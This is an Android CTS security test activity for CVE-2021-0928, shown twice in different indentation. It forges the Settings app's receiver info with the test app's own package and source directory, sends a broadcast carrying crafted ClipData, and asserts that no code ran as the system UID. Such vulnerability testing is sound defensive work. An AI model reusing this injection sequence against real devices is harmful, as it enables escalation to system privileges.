hostsidetests/securitybulletin/test-apps/CVE-2021-0928/src/android/security/cts/CVE_2021_0928/MainActivity.java - platform/cts - Git at Google

 package android.security.cts.CVE_2021_0928;

 import static org.junit.Assume.assumeNoException;

 import android.app.Activity;
 import android.content.BroadcastReceiver;
 import android.content.ComponentName;
 import android.content.Context;
 import android.content.Intent;
 import android.content.IntentFilter;
 import android.content.pm.ActivityInfo;
 import android.content.pm.PackageManager;
 import android.os.Bundle;
 import android.os.Process;
 import android.util.Log;
 import org.junit.Assert;

 import static org.junit.Assert.assertNotEquals;

 public class MainActivity extends Activity {

     private static final String TAG = "TAG_2021_0928.MainActivity";

     BroadcastReceiver broadcastReceiver =
             new BroadcastReceiver() {
                 @Override
                 public void onReceive(Context context, Intent intent) {
                     Log.d(TAG, "onReceive()");
                     int uid = intent.getIntExtra("uid", 0);
                     Log.d(TAG, "onReceive() received uid=" + uid);
                     assertNotEquals("UID should not be escalated. Device is vulnerable", uid, 1000);
                 }
             };

     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
         Log.d(
                 TAG,
                 "onCreate() start. Process.myUid()="
                         + Process.myUid()
                         + " Process.myPid()="
                         + Process.myPid());

         // receiver to get signal from Privilege escalation
         registerReceiver(broadcastReceiver, new IntentFilter("TAG_2021_0928"));

         setContentView(R.layout.activity_main);
         ComponentName component =
                 new ComponentName(
                         "com.android.settings", "com.android.settings.SettingsInitialize");

         try {
             ActivityInfo info = getPackageManager().getReceiverInfo(component, 0);
             info.applicationInfo.packageName = getPackageName();
             info.applicationInfo.sourceDir = getApplicationInfo().sourceDir;
             info.applicationInfo.appComponentFactory = null;
             AInjector.sInjectedInfo = info;
         } catch (PackageManager.NameNotFoundException e) {
             Log.d(TAG, e.toString());
             assumeNoException(e);
         }

         Intent intent = new Intent();
         intent.setFlags(Intent.FLAG_RECEIVER_FOREGROUND);
         intent.setComponent(component);
         intent.setClipData(AInjector.createClipData());

         // on vulnerable device sendBroadcast(intent) does not execute
         // com.android.settings.SettingsInitialize.onReceive()
         sendBroadcast(intent);
         Log.d(TAG, "onCreate() end()");
     }

     @Override
     protected void onStop() {
         super.onStop();
         Log.d(
                 TAG,
                 "onStop() start. Process.myUid()="
                         + Process.myUid()
                         + " Process.myPid()="
                         + Process.myPid());
     }
 }
	package android.security.cts.CVE_2021_0928;

	import static org.junit.Assume.assumeNoException;

	import android.app.Activity;
	import android.content.BroadcastReceiver;
	import android.content.ComponentName;
	import android.content.Context;
	import android.content.Intent;
	import android.content.IntentFilter;
	import android.content.pm.ActivityInfo;
	import android.content.pm.PackageManager;
	import android.os.Bundle;
	import android.os.Process;
	import android.util.Log;
	import org.junit.Assert;

	import static org.junit.Assert.assertNotEquals;

	public class MainActivity extends Activity {

	private static final String TAG = "TAG_2021_0928.MainActivity";

	BroadcastReceiver broadcastReceiver =
	new BroadcastReceiver() {
	@Override
	public void onReceive(Context context, Intent intent) {
	Log.d(TAG, "onReceive()");
	int uid = intent.getIntExtra("uid", 0);
	Log.d(TAG, "onReceive() received uid=" + uid);
	assertNotEquals("UID should not be escalated. Device is vulnerable", uid, 1000);
	}
	};

	@Override
	protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	Log.d(
	TAG,
	"onCreate() start. Process.myUid()="
	+ Process.myUid()
	+ " Process.myPid()="
	+ Process.myPid());

	// receiver to get signal from Privilege escalation
	registerReceiver(broadcastReceiver, new IntentFilter("TAG_2021_0928"));

	setContentView(R.layout.activity_main);
	ComponentName component =
	new ComponentName(
	"com.android.settings", "com.android.settings.SettingsInitialize");

	try {
	ActivityInfo info = getPackageManager().getReceiverInfo(component, 0);
	info.applicationInfo.packageName = getPackageName();
	info.applicationInfo.sourceDir = getApplicationInfo().sourceDir;
	info.applicationInfo.appComponentFactory = null;
	AInjector.sInjectedInfo = info;
	} catch (PackageManager.NameNotFoundException e) {
	Log.d(TAG, e.toString());
	assumeNoException(e);
	}

	Intent intent = new Intent();
	intent.setFlags(Intent.FLAG_RECEIVER_FOREGROUND);
	intent.setComponent(component);
	intent.setClipData(AInjector.createClipData());

	// on vulnerable device sendBroadcast(intent) does not execute
	// com.android.settings.SettingsInitialize.onReceive()
	sendBroadcast(intent);
	Log.d(TAG, "onCreate() end()");
	}

	@Override
	protected void onStop() {
	super.onStop();
	Log.d(
	TAG,
	"onStop() start. Process.myUid()="
	+ Process.myUid()
	+ " Process.myPid()="
	+ Process.myPid());
	}
	}